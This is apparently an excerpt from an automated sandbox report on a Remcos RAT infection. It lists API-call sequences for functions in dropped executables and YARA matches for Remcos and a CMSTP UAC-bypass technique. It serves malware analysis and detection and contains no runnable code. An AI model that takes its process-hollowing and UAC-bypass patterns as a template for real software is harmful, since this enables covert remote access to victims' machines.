                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,25_2_00007FF67DE6FC20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DF098B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,25_2_00007FF67DEC184C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF093A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED342C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357,25_2_00007FF67DED0EF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360,25_2_00007FF67DF06EA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,25_2_00007FF67DEC0F58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,25_2_00007FF67DEBEA7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,25_2_00007FF67DE929A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF0A740
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,25_2_00007FF67DE925E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,25_2_00007FF67DECE1F8

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess Stats: CPU usage > 49%
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF789BD89E4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF789BC3D94
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD898C NtQueryInformationToken,4_2_00007FF789BD898C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF789BEBCF0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF789BD8114
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF789BD88C0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF789BD7FF8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF789BD89E4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF789BC3D94
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD898C NtQueryInformationToken,6_2_00007FF789BD898C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF789BEBCF0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF789BD8114
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF789BD88C0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF789BD7FF8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655889890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,14_2_00007FF655889890
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,25_2_00007FF67DF2C964
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028AC2D8 NtCreateFile,NtWriteFile,28_2_028AC2D8
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028AC3BC NtOpenFile,NtReadFile,NtClose,28_2_028AC3BC
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A78E0 NtAllocateVirtualMemory,28_2_028A78E0
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028AC2D6 NtCreateFile,NtWriteFile,28_2_028AC2D6
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A78DE NtAllocateVirtualMemory,28_2_028A78DE
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0BB35 OpenProcess,NtResumeProcess,CloseHandle,28_2_1BA0BB35
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0BB09 OpenProcess,NtSuspendProcess,CloseHandle,28_2_1BA0BB09
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA032D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,28_2_1BA032D2
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,28_2_1BA0D58F
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,29_2_00007FF789BD8114
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,29_2_00007FF789BD7FF8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,29_2_00007FF789BD89E4
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,29_2_00007FF789BC3D94
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD898C NtQueryInformationToken,29_2_00007FF789BD898C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,29_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,29_2_00007FF789BEBCF0
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,29_2_00007FF789BD88C0
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029BC3BC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,36_2_029BC3BC
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029B78E0 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,36_2_029B78E0
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029BC2D8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,36_2_029BC2D8
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029BC2D6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,36_2_029BC2D6
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029B7A38 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,36_2_029B7A38
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029B78DE GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,36_2_029B78DE
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029B7EBE CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,36_2_029B7EBE
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029B7EC0 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,36_2_029B7EC0
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210732D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,36_2_210732D2
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107BB09 OpenProcess,NtSuspendProcess,CloseHandle,36_2_2107BB09
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107BB35 OpenProcess,NtResumeProcess,CloseHandle,36_2_2107BB35
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF789BC5240
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF789BD4224
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA067B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,28_2_1BA067B9
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,36_2_210767B4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD0A6C4_2_00007FF789BD0A6C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD42244_2_00007FF789BD4224
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BCAA544_2_00007FF789BCAA54
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD55544_2_00007FF789BD5554
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD37D84_2_00007FF789BD37D8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC6EE44_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BE7F004_2_00007FF789BE7F00
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BCE6804_2_00007FF789BCE680
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEEE884_2_00007FF789BEEE88
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC22204_2_00007FF789BC2220
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC4A304_2_00007FF789BC4A30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEAA304_2_00007FF789BEAA30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC52404_2_00007FF789BC5240
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC76504_2_00007FF789BC7650
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BCD2504_2_00007FF789BCD250
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC9E504_2_00007FF789BC9E50
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC8DF84_2_00007FF789BC8DF8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BCCE104_2_00007FF789BCCE10
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC81D44_2_00007FF789BC81D4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BED9D04_2_00007FF789BED9D0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC7D304_2_00007FF789BC7D30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BF15384_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BCB0D84_2_00007FF789BCB0D8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC85104_2_00007FF789BC8510
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD18D44_2_00007FF789BD18D4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC18844_2_00007FF789BC1884
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD78544_2_00007FF789BD7854
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC2C484_2_00007FF789BC2C48
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEAC4C4_2_00007FF789BEAC4C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC6BE04_2_00007FF789BC6BE0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC34104_2_00007FF789BC3410
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BEAFBC4_2_00007FF789BEAFBC
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC5B704_2_00007FF789BC5B70
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC3F904_2_00007FF789BC3F90
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC372C4_2_00007FF789BC372C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC9B504_2_00007FF789BC9B50
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD0A6C6_2_00007FF789BD0A6C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD42246_2_00007FF789BD4224
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCAA546_2_00007FF789BCAA54
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD55546_2_00007FF789BD5554
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD37D86_2_00007FF789BD37D8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC6EE46_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BE7F006_2_00007FF789BE7F00
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCE6806_2_00007FF789BCE680
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEEE886_2_00007FF789BEEE88
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC22206_2_00007FF789BC2220
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC4A306_2_00007FF789BC4A30
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEAA306_2_00007FF789BEAA30
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC52406_2_00007FF789BC5240
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC76506_2_00007FF789BC7650
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCD2506_2_00007FF789BCD250
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC9E506_2_00007FF789BC9E50
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC8DF86_2_00007FF789BC8DF8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCCE106_2_00007FF789BCCE10
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC81D46_2_00007FF789BC81D4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BED9D06_2_00007FF789BED9D0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC7D306_2_00007FF789BC7D30
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BF15386_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCB0D86_2_00007FF789BCB0D8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC85106_2_00007FF789BC8510
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD18D46_2_00007FF789BD18D4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC18846_2_00007FF789BC1884
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD78546_2_00007FF789BD7854
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC2C486_2_00007FF789BC2C48
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEAC4C6_2_00007FF789BEAC4C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC6BE06_2_00007FF789BC6BE0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC34106_2_00007FF789BC3410
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEAFBC6_2_00007FF789BEAFBC
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC5B706_2_00007FF789BC5B70
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC3F906_2_00007FF789BC3F90
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC372C6_2_00007FF789BC372C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC9B506_2_00007FF789BC9B50
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588605414_2_00007FF655886054
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588596C14_2_00007FF65588596C
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588166414_2_00007FF655881664
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655886EC814_2_00007FF655886EC8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558872C014_2_00007FF6558872C0
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655886AE814_2_00007FF655886AE8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558883D814_2_00007FF6558883D8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588512814_2_00007FF655885128
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588431814_2_00007FF655884318
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588405014_2_00007FF655884050
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655889C7414_2_00007FF655889C74
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588767014_2_00007FF655887670
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655882D7014_2_00007FF655882D70
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588989014_2_00007FF655889890
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655887C7C14_2_00007FF655887C7C
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558867A014_2_00007FF6558867A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1C12025_2_00007FF67DF1C120
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1BC1025_2_00007FF67DF1BC10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF4380025_2_00007FF67DF43800
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1F02025_2_00007FF67DF1F020
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE42F3825_2_00007FF67DE42F38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1CCB825_2_00007FF67DF1CCB8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC5F0425_2_00007FF67DEC5F04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB9EE425_2_00007FF67DEB9EE4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE81ED025_2_00007FF67DE81ED0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDEB025_2_00007FF67DEBDEB0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8DEA425_2_00007FF67DE8DEA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBBE7025_2_00007FF67DEBBE70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC1E2C25_2_00007FF67DEC1E2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65DF725_2_00007FF67DE65DF7
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE41DE825_2_00007FF67DE41DE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECBDA025_2_00007FF67DECBDA0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE91D7025_2_00007FF67DE91D70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE7D7025_2_00007FF67DEE7D70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE89D6C25_2_00007FF67DE89D6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3DD8425_2_00007FF67DF3DD84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9C0B825_2_00007FF67DE9C0B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0208425_2_00007FF67DF02084
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6808025_2_00007FF67DE68080
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9801825_2_00007FF67DE98018
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9FF825_2_00007FF67DEE9FF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE31F8025_2_00007FF67DE31F80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFBB2825_2_00007FF67DEFBB28
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE97AC825_2_00007FF67DE97AC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE47AB425_2_00007FF67DE47AB4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9A5825_2_00007FF67DEE9A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE81A6025_2_00007FF67DE81A60
